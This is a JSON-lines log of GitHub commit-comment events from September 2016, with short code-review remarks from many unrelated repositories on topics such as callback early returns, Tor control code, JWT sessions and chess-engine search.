{"id":"4590003403","type":"CommitCommentEvent","actor":{"login":"nicholascloud"},"repo":{"name":"adamlucz90/RecordmateAngular"},"payload":{"comment":{"id":19097063,"position":102,"line":59,"path":"api/controllers/collection.js","commit_id":"08c77236bd46beedb46073e0cbd7a81ff5e7bdf7","created_at":"2016-09-20T14:26:03Z","updated_at":"2016-09-20T14:26:03Z","body":"Return here so the rest of the function is ignored. This is a pretty common pattern, e.g.:\r\n\r\n```js\r\ncollect.find({username: req.body.user}).lean().exec(function(err, items){\r\n  if(err){\r\n    // Return early so the rest of the function is ignored.\r\n    // Because this is a callback function and the return value\r\n    // is irrelevant, we can return here on the same line as\r\n    // res.status(), OR you we can add a return statement *below*\r\n    // res.status() -- either way works.\r\n    return res.status(400);\r\n  }\r\n  \r\n  // If we've made it this far it is safe to assume we have items.\r\n  res.status(200).json({items});\r\n});\r\n```"}},"created_at":"2016-09-20T14:26:03Z"}
{"id":"4590003560","type":"CommitCommentEvent","actor":{"login":"GreatTry"},"repo":{"name":"GreatTry/ghrey"},"payload":{"comment":{"id":19097065,"position":2,"line":2,"path":"index.html","commit_id":"b9fb8718c82960ef1a8af4c1973c4181e4b14542","created_at":"2016-09-20T14:26:04Z","updated_at":"2016-09-20T14:26:04Z","body":"`<input type=\"f\">`"}},"created_at":"2016-09-20T14:26:04Z"}
{"id":"4590007797","type":"CommitCommentEvent","actor":{"login":"dannon"},"repo":{"name":"dannon/pysam"},"payload":{"comment":{"id":19097069,"position":23,"line":861,"path":"pysam/ctabix.pyx","commit_id":"b2d358668b611ffbf1fbfa1eab306c0b0459473a","created_at":"2016-09-20T14:26:39Z","updated_at":"2016-09-20T14:26:39Z","body":"Thanks, I definitely prefer the fix in #2."}},"created_at":"2016-09-20T14:26:39Z"}
{"id":"4590008527","type":"CommitCommentEvent","actor":{"login":"superbong"},"repo":{"name":"albatStudio/happyBaby"},"payload":{"comment":{"id":19097073,"position":null,"line":null,"path":null,"commit_id":"600e0235e3f6a5c41e19871c31603194c10ece52","created_at":"2016-09-20T14:26:46Z","updated_at":"2016-09-20T14:26:46Z","body":"누가 했는지 몰라도 잘했네"}},"created_at":"2016-09-20T14:26:46Z"}
{"id":"4590016088","type":"CommitCommentEvent","actor":{"login":"HenryQuan"},"repo":{"name":"HenryQuan/WOWS-Training-Room"},"payload":{"comment":{"id":19097099,"position":null,"line":null,"path":null,"commit_id":"34840d2f38118d4a307bda346d70fb7f7b6b9f1e","created_at":"2016-09-20T14:27:53Z","updated_at":"2016-09-20T14:27:53Z","body":"Well, I mean the data.txt has the data I needed... I was half-awake."}},"created_at":"2016-09-20T14:27:53Z"}
{"id":"4590016808","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19097100,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T14:27:59Z","updated_at":"2016-09-20T14:27:59Z","body":"Since `jd_to_gregorian2` and `gregorian_to_jd2` (Gregorian only, Wikipedia-based) functions are irreversible they are a possible way for Gregorian dates :smiling_imp:"}},"created_at":"2016-09-20T14:27:59Z"}
{"id":"4590017501","type":"CommitCommentEvent","actor":{"login":"pameck"},"repo":{"name":"hackforprivacy/cryptohack.net"},"payload":{"comment":{"id":19097103,"position":null,"line":null,"path":null,"commit_id":"942214aec700c1d054725ae4e34f17cf27a35b11","created_at":"2016-09-20T14:28:05Z","updated_at":"2016-09-20T14:28:05Z","body":"This post doesn't include the Zuckering part, nor the images or the reference to them... We can add that later. "}},"created_at":"2016-09-20T14:28:05Z"}
{"id":"4590019194","type":"CommitCommentEvent","actor":{"login":"jpfr"},"repo":{"name":"open62541/open62541"},"payload":{"comment":{"id":19097108,"position":null,"line":null,"path":null,"commit_id":"08b19b00e3b9392f71dd76d249b84102e180aa37","created_at":"2016-09-20T14:28:20Z","updated_at":"2016-09-20T14:28:20Z","body":"Can we keep the check with the following exceptions?\r\n\r\n- No array dimensions -> array dimension 1 is covered as well. Since we can have an array in the variant with no additional array dimensions defined\r\n- No value defined matches all combinations of valuerank/datatype/array dimensions"}},"created_at":"2016-09-20T14:28:20Z"}
{"id":"4590021593","type":"CommitCommentEvent","actor":{"login":"frederic-mahe"},"repo":{"name":"torognes/vsearch"},"payload":{"comment":{"id":19097116,"position":null,"line":null,"path":null,"commit_id":"dcf0d4f4b1403e904f467580fc86d2a249304f7d","created_at":"2016-09-20T14:28:43Z","updated_at":"2016-09-20T14:28:43Z","body":"`Input` is meant as `Input data`, so only for secondary input files (references, R2 FASTQ, etc). Maybe we can replace it with `Data` or `Input data`? or drop it as it will never contain more than one item?"}},"created_at":"2016-09-20T14:28:43Z"}
{"id":"4590027285","type":"CommitCommentEvent","actor":{"login":"pranshu27"},"repo":{"name":"ProjectRecommend/docs"},"payload":{"comment":{"id":19097135,"position":null,"line":null,"path":null,"commit_id":"8ebe5826b3ae228de8ed32579138aa6669332dc5","created_at":"2016-09-20T14:29:33Z","updated_at":"2016-09-20T14:29:33Z","body":"@mrinalpande  Although I talked about the network coverage in India, specifically, I actually meant that , all those people who want to get music recommendations around the globe, and live in the regions devoid of faster internet connection, can use this software accordingly.  Anyways thanks, I will update that (Y). "}},"created_at":"2016-09-20T14:29:33Z"}
{"id":"4590028921","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19097138,"position":null,"line":null,"path":null,"commit_id":"b79ca63a3419b0f7422dd6a6f940d8ad6d325a5b","created_at":"2016-09-20T14:29:48Z","updated_at":"2016-09-20T14:29:48Z","body":"Also see [Pull Request 291](http://github.com/weidai11/cryptopp/pull/291)."}},"created_at":"2016-09-20T14:29:48Z"}
{"id":"4590029223","type":"CommitCommentEvent","actor":{"login":"bajtos"},"repo":{"name":"strongloop/loopback-policy"},"payload":{"comment":{"id":19097139,"position":null,"line":null,"path":null,"commit_id":"87604ed300e5ac2f990ad9349e5cf0de7266899d","created_at":"2016-09-20T14:29:51Z","updated_at":"2016-09-20T14:29:51Z","body":"@superkhau makes me wonder, why wasn't this repo moved to `loopback-archive`?"}},"created_at":"2016-09-20T14:29:51Z"}
{"id":"4590030876","type":"CommitCommentEvent","actor":{"login":"daira"},"repo":{"name":"david415/foolscap"},"payload":{"comment":{"id":19097144,"position":null,"line":null,"path":null,"commit_id":"02e2601fa3631f510d01b3cd6217c940c970340c","created_at":"2016-09-20T14:30:05Z","updated_at":"2016-09-20T14:30:05Z","body":"ACK"}},"created_at":"2016-09-20T14:30:05Z"}
{"id":"4590032327","type":"CommitCommentEvent","actor":{"login":"simonrozsival"},"repo":{"name":"ReCodEx/api"},"payload":{"comment":{"id":19097152,"position":18,"line":56,"path":"app/V1Module/security/Authorizator.php","commit_id":"bbdb6620a6957728e61c2a9f562854b338cecf12","created_at":"2016-09-20T14:30:18Z","updated_at":"2016-09-20T14:30:18Z","body":"I guess there is no test for the Authorizator class.. creating one would be much appreciated! :)"}},"created_at":"2016-09-20T14:30:18Z"}
{"id":"4590040100","type":"CommitCommentEvent","actor":{"login":"renz45"},"repo":{"name":"drinkingChai/angular-project-3"},"payload":{"comment":{"id":19097165,"position":5,"line":18,"path":"app/assets/templates/notes/edit.html","commit_id":"aaa6f0a158444d93095f0ad1e315186fa84dd4a4","created_at":"2016-09-20T14:31:25Z","updated_at":"2016-09-20T14:31:25Z","body":"np! I don't do much html myself these days, and even less with forms. I still get stuck on stuff like this all the time. :)"}},"created_at":"2016-09-20T14:31:25Z"}
{"id":"4590046160","type":"CommitCommentEvent","actor":{"login":"torognes"},"repo":{"name":"torognes/vsearch"},"payload":{"comment":{"id":19097176,"position":null,"line":null,"path":null,"commit_id":"dcf0d4f4b1403e904f467580fc86d2a249304f7d","created_at":"2016-09-20T14:32:18Z","updated_at":"2016-09-20T14:32:18Z","body":"Ok, I see. \"Input\" is fine."}},"created_at":"2016-09-20T14:32:18Z"}
{"id":"4590047424","type":"CommitCommentEvent","actor":{"login":"ccrisan"},"repo":{"name":"ccrisan/motioneyeos"},"payload":{"comment":{"id":19097178,"position":null,"line":null,"path":null,"commit_id":"7fe6ed1eb6ef2291b830c3711857595770f01f9d","created_at":"2016-09-20T14:32:28Z","updated_at":"2016-09-20T14:32:28Z","body":"Can you send me your log files (all of them)?"}},"created_at":"2016-09-20T14:32:28Z"}
{"id":"4590047883","type":"CommitCommentEvent","actor":{"login":"jordens"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":19097179,"position":null,"line":null,"path":null,"commit_id":"2011a5f243d1b187420d17f5cceb8893790c5b16","created_at":"2016-09-20T14:32:33Z","updated_at":"2016-09-20T14:32:33Z","body":"10 GHz line rate, 125 MHz fabric."}},"created_at":"2016-09-20T14:32:33Z"}
{"id":"4590049715","type":"CommitCommentEvent","actor":{"login":"nredbugs"},"repo":{"name":"nredbugs/app_emails"},"payload":{"comment":{"id":19097180,"position":18,"line":18,"path":"app/Http/Controllers/testController.php","commit_id":"d763d25f809f75b25f72a04aae8ad781d5ae4f61","created_at":"2016-09-20T14:32:49Z","updated_at":"2016-09-20T14:32:49Z","body":"Estoy por cambiarlo, es correo nuevo para tester pero si lo cambiare. Gracias"}},"created_at":"2016-09-20T14:32:49Z"}
{"id":"4590051618","type":"CommitCommentEvent","actor":{"login":"garak"},"repo":{"name":"PUGX/PUGXGeoFormBundle"},"payload":{"comment":{"id":19097188,"position":null,"line":null,"path":null,"commit_id":"0be41acbb2f30c43bc712970c538209edd8bb52d","created_at":"2016-09-20T14:33:05Z","updated_at":"2016-09-20T14:33:05Z","body":"No idea. Are you using the latest version of composer?"}},"created_at":"2016-09-20T14:33:05Z"}
{"id":"4590054481","type":"CommitCommentEvent","actor":{"login":"destdev"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19097192,"position":null,"line":null,"path":null,"commit_id":"78fcf7d3018f5ece6c00da31a4ccf0a899fd1a8d","created_at":"2016-09-20T14:33:31Z","updated_at":"2016-09-20T14:33:31Z","body":"the current english translation for gadget says, that cards and effects of that type can't be activated\r\nI can't say for sure if that isn't a translation error though"}},"created_at":"2016-09-20T14:33:31Z"}
{"id":"4590058543","type":"CommitCommentEvent","actor":{"login":"Stanimirp1"},"repo":{"name":"Kartela/DaBugvameQko"},"payload":{"comment":{"id":19097203,"position":null,"line":null,"path":null,"commit_id":"d72fb5441fffcdc88351cd179d3e394704f17044","created_at":"2016-09-20T14:34:08Z","updated_at":"2016-09-20T14:34:08Z","body":"proba"}},"created_at":"2016-09-20T14:34:08Z"}
{"id":"4590061554","type":"CommitCommentEvent","actor":{"login":"Remiii"},"repo":{"name":"PUGX/PUGXGeoFormBundle"},"payload":{"comment":{"id":19097212,"position":null,"line":null,"path":null,"commit_id":"0be41acbb2f30c43bc712970c538209edd8bb52d","created_at":"2016-09-20T14:34:32Z","updated_at":"2016-09-20T14:34:32Z","body":"@garak Yep :-)"}},"created_at":"2016-09-20T14:34:32Z"}
{"id":"4590063895","type":"CommitCommentEvent","actor":{"login":"AndersonLeony"},"repo":{"name":"DaniloReis10/webcondominio"},"payload":{"comment":{"id":19097217,"position":null,"line":null,"path":null,"commit_id":"04ae6aab4b92c27df5aaa86ddfc85b22c7ee89d2","created_at":"2016-09-20T14:34:51Z","updated_at":"2016-09-20T14:34:51Z","body":"Ainda está faltando a tela de consultar/emitir boletos"}},"created_at":"2016-09-20T14:34:51Z"}
{"id":"4590066638","type":"CommitCommentEvent","actor":{"login":"wasdennnoch"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19097241,"position":5,"line":182,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/notifications/NotificationHooks.java","commit_id":"b85c10bf01ef4711716430a559f2e705145daf05","created_at":"2016-09-20T14:35:15Z","updated_at":"2016-09-20T14:35:15Z","body":"Well, heads-up got introduced in M, on L there is exactly nothing related to heads-up, including that manager. "}},"created_at":"2016-09-20T14:35:15Z"}
{"id":"4590073380","type":"CommitCommentEvent","actor":{"login":"TomasVotruba"},"repo":{"name":"nejenophp/nejenophp.cz"},"payload":{"comment":{"id":19097270,"position":null,"line":null,"path":null,"commit_id":"f8b93e269c229cdd3ba7d458505e5befee6f34e8","created_at":"2016-09-20T14:36:13Z","updated_at":"2016-09-20T14:36:13Z","body":"Nice. This is subdomain leading to your server?"}},"created_at":"2016-09-20T14:36:13Z"}
{"id":"4590074155","type":"CommitCommentEvent","actor":{"login":"TomasVotruba"},"repo":{"name":"nejenophp/nejenophp.cz"},"payload":{"comment":{"id":19097272,"position":null,"line":null,"path":null,"commit_id":"772cf9a4d3c5804c121ea467b9bcddd10db994a4","created_at":"2016-09-20T14:36:19Z","updated_at":"2016-09-20T14:36:19Z","body":"Beautiful :)"}},"created_at":"2016-09-20T14:36:19Z"}
{"id":"4590074880","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19097274,"position":null,"line":null,"path":null,"commit_id":"e08980f14b20b0e9a5e95b7f5386fa0d21e4a36b","created_at":"2016-09-20T14:36:26Z","updated_at":"2016-09-20T14:36:26Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35712/testReport/) for this commit**"}},"created_at":"2016-09-20T14:36:26Z"}
{"id":"4590075340","type":"CommitCommentEvent","actor":{"login":"flar2"},"repo":{"name":"flar2/android_kernel_oneplus_msm8996"},"payload":{"comment":{"id":19097275,"position":null,"line":null,"path":null,"commit_id":"ba0040ae167bce32408e49ee40a12fa4e670e367","created_at":"2016-09-20T14:36:30Z","updated_at":"2016-09-20T14:36:30Z","body":"Whoops, I forgot to update this for big cluster on cpu2, still set to snapdragon 810/808 configuration"}},"created_at":"2016-09-20T14:36:30Z"}
{"id":"4590083196","type":"CommitCommentEvent","actor":{"login":"nedfreetoplay"},"repo":{"name":"nedfreetoplay/gmod_lua"},"payload":{"comment":{"id":19097293,"position":40,"line":114,"path":"entity/modules_money_printer/cl_init.lua","commit_id":"004e20330c9409e9d4bd87ae2b2aeded61efef00","created_at":"2016-09-20T14:37:39Z","updated_at":"2016-09-20T14:37:39Z","body":"Будем переписывать весь HUD"}},"created_at":"2016-09-20T14:37:39Z"}
{"id":"4590087432","type":"CommitCommentEvent","actor":{"login":"daira"},"repo":{"name":"david415/tahoe-lafs"},"payload":{"comment":{"id":19097304,"position":27,"line":27,"path":"src/allmydata/tor.py","commit_id":"969503eb7fa4f0a11c84bf9a46ffa37bf64c17ee","created_at":"2016-09-20T14:38:17Z","updated_at":"2016-09-20T14:38:17Z","body":"Use just ``return defer.succeed(self.tor_control_protocol)`` to reduce nesting, and so that the reader doesn't need to read past the ``else`` branch to see what happens."}},"created_at":"2016-09-20T14:38:17Z"}
{"id":"4590093498","type":"CommitCommentEvent","actor":{"login":"jeremyevans"},"repo":{"name":"jeremyevans/rodauth"},"payload":{"comment":{"id":19097314,"position":13,"line":11,"path":"CHANGELOG","commit_id":"2101cfc1b50ba60956feb77b2512ee1010585419","created_at":"2016-09-20T14:39:12Z","updated_at":"2016-09-20T14:39:12Z","body":"Unfortunately, there has to be some way to handle the case where no JWT is provided in the authorization header, but we still want to use an empty hash as the session instead of falling back to the rack session.  Certainly in :json=>:only mode, we should always use an empty session, and never use the rack session.  If :json=>:only mode is not used, then I think the current default of assuming JWT for JSON requests and rack session for non-JSON requests is reasonable.  If the client wants different behavior, they can override it.  I think the strategy you propose of just using the rack session if the JWT is not provided would break the jwt plugin completely outside of :json=>:only mode, since you would not be able to login via the API."}},"created_at":"2016-09-20T14:39:12Z"}
{"id":"4590096123","type":"CommitCommentEvent","actor":{"login":"Maxr1998"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19097320,"position":5,"line":182,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/notifications/NotificationHooks.java","commit_id":"b85c10bf01ef4711716430a559f2e705145daf05","created_at":"2016-09-20T14:39:37Z","updated_at":"2016-09-20T14:39:37Z","body":"Didn't L also have heads up? Maybe they used a  different code back then."}},"created_at":"2016-09-20T14:39:37Z"}
{"id":"4590098749","type":"CommitCommentEvent","actor":{"login":"thecristen"},"repo":{"name":"projecttacoma/bonnie"},"payload":{"comment":{"id":19097325,"position":null,"line":null,"path":null,"commit_id":"ff21c5e6b5edefab0741c0e4ee439012943adb72","created_at":"2016-09-20T14:40:01Z","updated_at":"2016-09-20T14:40:01Z","body":"Ok this should be addressed now. Thanks for catching!"}},"created_at":"2016-09-20T14:40:01Z"}
{"id":"4590102698","type":"CommitCommentEvent","actor":{"login":"jrah"},"repo":{"name":"matthewmorek/wfp-careers"},"payload":{"comment":{"id":19097338,"position":null,"line":null,"path":null,"commit_id":"b58fedeaca3c8fc0eb82a9cf06e263dc58acb94f","created_at":"2016-09-20T14:40:35Z","updated_at":"2016-09-20T14:40:35Z","body":"Ref #12 "}},"created_at":"2016-09-20T14:40:35Z"}
{"id":"4590102930","type":"CommitCommentEvent","actor":{"login":"Paebbels"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19097340,"position":6,"line":33,"path":"src/math.vhdl","commit_id":"10eb07b7dd2e56a8fe88c75df39d57a4cb76c71a","created_at":"2016-09-20T14:40:37Z","updated_at":"2016-09-20T14:40:37Z","body":"I'm perfectly fine if the square and cubic numbers won't make it into corelib :). As I started `math`, I didn't want to have a package with only one function. ..\r\n\r\nWhat do you mean with item 3? Should input be in range `0 to sqrt(positive'high)`?\r\nI don't think so, because positive is not limited to `2**31`."}},"created_at":"2016-09-20T14:40:37Z"}
{"id":"4590107592","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19097353,"position":null,"line":null,"path":null,"commit_id":"0e822c1f2fd42e39af421670f69c681019a3e3d8","created_at":"2016-09-20T14:41:17Z","updated_at":"2016-09-20T14:41:17Z","body":"Absolutely but this is the point we had to discuss. Do we allow the user of those --override in combination only or each can be called individually. This need to be addressed in the api also."}},"created_at":"2016-09-20T14:41:17Z"}
{"id":"4590107836","type":"CommitCommentEvent","actor":{"login":"dsuare1"},"repo":{"name":"dsuare1/the_round_about"},"payload":{"comment":{"id":19097355,"position":null,"line":null,"path":null,"commit_id":"7f9a680fd961de91b246ca91ae01677946785176","created_at":"2016-09-20T14:41:19Z","updated_at":"2016-09-20T14:41:19Z","body":"-updated much of the code to ES6 standards;\r\n-set up MongoDB connection using Mongoose;\r\n-created 3 models for database storage:\r\n  1) model for albums 'Album.js'\r\n  2) model for events 'Event.js'\r\n  3) model for users 'User.js'"}},"created_at":"2016-09-20T14:41:19Z"}
{"id":"4590108731","type":"CommitCommentEvent","actor":{"login":"patriciogonzalezvivo"},"repo":{"name":"tangrams/tangram-es"},"payload":{"comment":{"id":19097357,"position":54,"line":54,"path":"core/common/platform_gl.h","commit_id":"7286d0f544ef6de6eab5beb21be90a4b949773ae","created_at":"2016-09-20T14:41:27Z","updated_at":"2016-09-20T14:41:27Z","body":"@hjanetzek Can we add ```#include <GLES2/gl2ext.h>``` back here we need it for https://github.com/tangrams/tangram-es/issues/984"}},"created_at":"2016-09-20T14:41:27Z"}
{"id":"4590110328","type":"CommitCommentEvent","actor":{"login":"wasdennnoch"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19097361,"position":5,"line":182,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/notifications/NotificationHooks.java","commit_id":"b85c10bf01ef4711716430a559f2e705145daf05","created_at":"2016-09-20T14:41:40Z","updated_at":"2016-09-20T14:41:40Z","body":"No :P"}},"created_at":"2016-09-20T14:41:40Z"}
{"id":"4590112798","type":"CommitCommentEvent","actor":{"login":"daira"},"repo":{"name":"david415/tahoe-lafs"},"payload":{"comment":{"id":19097366,"position":42,"line":42,"path":"src/allmydata/tor.py","commit_id":"969503eb7fa4f0a11c84bf9a46ffa37bf64c17ee","created_at":"2016-09-20T14:42:01Z","updated_at":"2016-09-20T14:42:01Z","body":"I would write this as:\r\n{{{\r\nif self.control_endpoint is None:\r\n    config = torconfig.TorConfig()\r\n    d = torconfig.launch_tor(config, reactor, tor_binary=self.tor_binary)\r\n    d.addCallback(lambda result: result.tor_protocol)\r\nelse:\r\n    d = torcontrolprotocol.connect(self.control_endpoint) # XXX use a password_function?\r\n\r\ndef remember_tor_protocol(result):\r\n    self.tor_control_protocol = result\r\n    return result\r\nd.addCallback(remember_tor_protocol)\r\nreturn d\r\n}}}"}},"created_at":"2016-09-20T14:42:01Z"}
{"id":"4590114805","type":"CommitCommentEvent","actor":{"login":"Guts"},"repo":{"name":"isogeo/isogeo-plugin-qgis"},"payload":{"comment":{"id":19097369,"position":null,"line":null,"path":null,"commit_id":"dfd32de0aa1f0394941f5e99e5348582e8414660","created_at":"2016-09-20T14:42:19Z","updated_at":"2016-09-20T14:42:19Z","body":"reference the issue. It'll help me to make users update"}},"created_at":"2016-09-20T14:42:19Z"}
{"id":"4590115764","type":"CommitCommentEvent","actor":{"login":"matthewcorreia-hitfox"},"repo":{"name":"ad2games/ad2games-theme"},"payload":{"comment":{"id":19097372,"position":5,"line":6,"path":"ad2games-theme.gemspec","commit_id":"de08d5bef03e6e42dfbf73e3728c90e93ed741cf","created_at":"2016-09-20T14:42:28Z","updated_at":"2016-09-20T14:42:28Z","body":"0.7 == 0.70 so 0.71 is only an increment of .01 right? 😅"}},"created_at":"2016-09-20T14:42:28Z"}
{"id":"4590115978","type":"CommitCommentEvent","actor":{"login":"bdejong"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19097373,"position":null,"line":null,"path":null,"commit_id":"0fa36f20c80b2128b88715020136babd15e4055d","created_at":"2016-09-20T14:42:29Z","updated_at":"2016-09-20T14:42:29Z","body":"This includes the download? Because we shouldn't be counting that. We should only look at the time spent in Django. Easiest way would be to time your view from entry to exit."}},"created_at":"2016-09-20T14:42:29Z"}
{"id":"4590116754","type":"CommitCommentEvent","actor":{"login":"patriciogonzalezvivo"},"repo":{"name":"tangrams/tangram-es"},"payload":{"comment":{"id":19097375,"position":54,"line":54,"path":"core/common/platform_gl.h","commit_id":"7286d0f544ef6de6eab5beb21be90a4b949773ae","created_at":"2016-09-20T14:42:36Z","updated_at":"2016-09-20T14:42:36Z","body":"Also we need \r\n\r\n```\r\n#ifdef PLATFORM_RPI\r\n// Dummy VertexArray functions\r\nGL_APICALL void GL_APIENTRY glBindVertexArray(GLuint array) {}\r\nGL_APICALL void GL_APIENTRY glDeleteVertexArrays(GLsizei n, const GLuint *arrays) {}\r\nGL_APICALL void GL_APIENTRY glGenVertexArrays(GLsizei n, GLuint *arrays) {}\r\n#endif\r\n```"}},"created_at":"2016-09-20T14:42:36Z"}
{"id":"4590124547","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19097401,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-20T14:43:43Z","updated_at":"2016-09-20T14:43:43Z","body":"You're welcome!\n\n2016-09-20 21:20 GMT+07:00 Muhammad Ihsan <notifications@github.com>:\n\n> Ok will try compile the kernel. Thank you very much for your answer bro :)\n> .\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ngoquang2708/android_device_samsung_vivalto3gvn/commit/bb12130b3135fc21f31bf639dc595ac6ca1addc6#commitcomment-19096935>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJOl9lPT_WywThOL85InncJiSjZZcl9yks5qr-uUgaJpZM4J4Cgx>\n> .\n>\n"}},"created_at":"2016-09-20T14:43:43Z"}
{"id":"4590125944","type":"CommitCommentEvent","actor":{"login":"tasleson"},"repo":{"name":"cathay4t/libstoragemgmt"},"payload":{"comment":{"id":19097404,"position":null,"line":null,"path":null,"commit_id":"286afa2089557323ce7de44ed6804c200602e6d8","created_at":"2016-09-20T14:43:56Z","updated_at":"2016-09-20T14:43:56Z","body":"This syntax is invalid for py3"}},"created_at":"2016-09-20T14:43:56Z"}
{"id":"4590126558","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19097406,"position":null,"line":null,"path":null,"commit_id":"0e822c1f2fd42e39af421670f69c681019a3e3d8","created_at":"2016-09-20T14:44:01Z","updated_at":"2016-09-20T14:44:01Z","body":"I would be in favor of requiring that either you have \"url\" or you have \"ctrl+data\".\r\n\r\nSo the API should expose a single setter with 2 arguments for ctrl+data."}},"created_at":"2016-09-20T14:44:01Z"}
{"id":"4590135963","type":"CommitCommentEvent","actor":{"login":"jespo655"},"repo":{"name":"jespo655/Compiler"},"payload":{"comment":{"id":19097445,"position":null,"line":null,"path":null,"commit_id":"ad7747667ec6a86630b1145d58ce103102a5bf2e","created_at":"2016-09-20T14:45:18Z","updated_at":"2016-09-20T14:45:18Z","body":"Laptop is dying; this was not really ready for committing but it was necessary in order to not lose a lot of work."}},"created_at":"2016-09-20T14:45:18Z"}
{"id":"4590136692","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"americool/sep-assignments"},"payload":{"comment":{"id":19097447,"position":8,"line":8,"path":"02-algorithms/7-Complex-Problems/tsp_greed.rb","commit_id":"5480ce7a76ff3af7ad5e308589568d06bd20ac13","created_at":"2016-09-20T14:45:24Z","updated_at":"2016-09-20T14:45:24Z","body":"You could do some dynamic programming to avoid recalculating distances."}},"created_at":"2016-09-20T14:45:24Z"}
{"id":"4590136779","type":"CommitCommentEvent","actor":{"login":"sadhyama"},"repo":{"name":"sadhyama/parodus"},"payload":{"comment":{"id":19097450,"position":null,"line":null,"path":null,"commit_id":"d591fe3ab169d501aa86a909e9b0da53ffcb6459","created_at":"2016-09-20T14:45:25Z","updated_at":"2016-09-20T14:45:25Z","body":"Added upstream and downstream message Handling in parodus for sending the data through nanomsg. Tested this changes by starting individual nanomsg clients from tests folder. Adding the Unit test cases are in progress."}},"created_at":"2016-09-20T14:45:25Z"}
{"id":"4590140121","type":"CommitCommentEvent","actor":{"login":"rascarlo"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19097459,"position":null,"line":null,"path":null,"commit_id":"60424128c62b35c9eb25aa5d85628c769b74b1cc","created_at":"2016-09-20T14:45:54Z","updated_at":"2016-09-20T14:45:54Z","body":"@marci4 awesome, thanks!"}},"created_at":"2016-09-20T14:45:54Z"}
{"id":"4590141319","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19097462,"position":null,"line":null,"path":null,"commit_id":"3b70074de00491478ca32a2c24f4591e4409aea0","created_at":"2016-09-20T14:46:04Z","updated_at":"2016-09-20T14:46:04Z","body":"@pb00068 I think I will wait for the pull request 808 to be applied (https://github.com/official-stockfish/Stockfish/pull/808), then push another test with my current state of \"discovered checks in see\" branch on top of it (avoids lsb(), fixes the un-initialised from bug): https://github.com/snicolet/Stockfish/commits/aligned3"}},"created_at":"2016-09-20T14:46:04Z"}
{"id":"4590142313","type":"CommitCommentEvent","actor":{"login":"tcitworld"},"repo":{"name":"wallabag/wallabag"},"payload":{"comment":{"id":19097467,"position":49,"line":98,"path":"tests/Wallabag/ImportBundle/Controller/BrowserControllerTest.php","commit_id":"4258f1641c86ecf5cfed68e53c7789f4367f0728","created_at":"2016-09-20T14:46:12Z","updated_at":"2016-09-20T14:46:12Z","body":":trollface: "}},"created_at":"2016-09-20T14:46:12Z"}
{"id":"4590143526","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19097471,"position":null,"line":null,"path":null,"commit_id":"3b70074de00491478ca32a2c24f4591e4409aea0","created_at":"2016-09-20T14:46:23Z","updated_at":"2016-09-20T14:46:23Z","body":"I don't think this is a bug, because we need updated 'from' only for verifying discovered checks.\r\nWhen min_attacker returns KING then it is the only left piece which can attack the exchange-square\r\nso it does'nt matter if we perform stmAttackers &= pieces(stm, KING) or not (and whether if it's legal move or not will finally be checked by the usual captured != KING condition).\r\n\r\nLooking at the 2 running test now, I see that we will have a hard time to make this algorithm work,\r\nthe first test looked promising the first 20k games but now the advantage is disappearing."}},"created_at":"2016-09-20T14:46:23Z"}
{"id":"4590143877","type":"CommitCommentEvent","actor":{"login":"rascarlo"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19097473,"position":null,"line":null,"path":null,"commit_id":"0735066995cd6aae047f097352b3422161bfe5d0","created_at":"2016-09-20T14:46:26Z","updated_at":"2016-09-20T14:46:26Z","body":"@Garduna1976 that was really fast! thank you|"}},"created_at":"2016-09-20T14:46:26Z"}
{"id":"4590148172","type":"CommitCommentEvent","actor":{"login":"Serg-Norseman"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19097487,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T14:47:03Z","updated_at":"2016-09-20T14:47:03Z","body":"Now rechecked. jd_to_gregorian2 <=> gregorian_to_jd2 (Gregorian only, Wikipedia-based) functions give reversible result of up to \"-4713/11/24\" [0]."}},"created_at":"2016-09-20T14:47:03Z"}
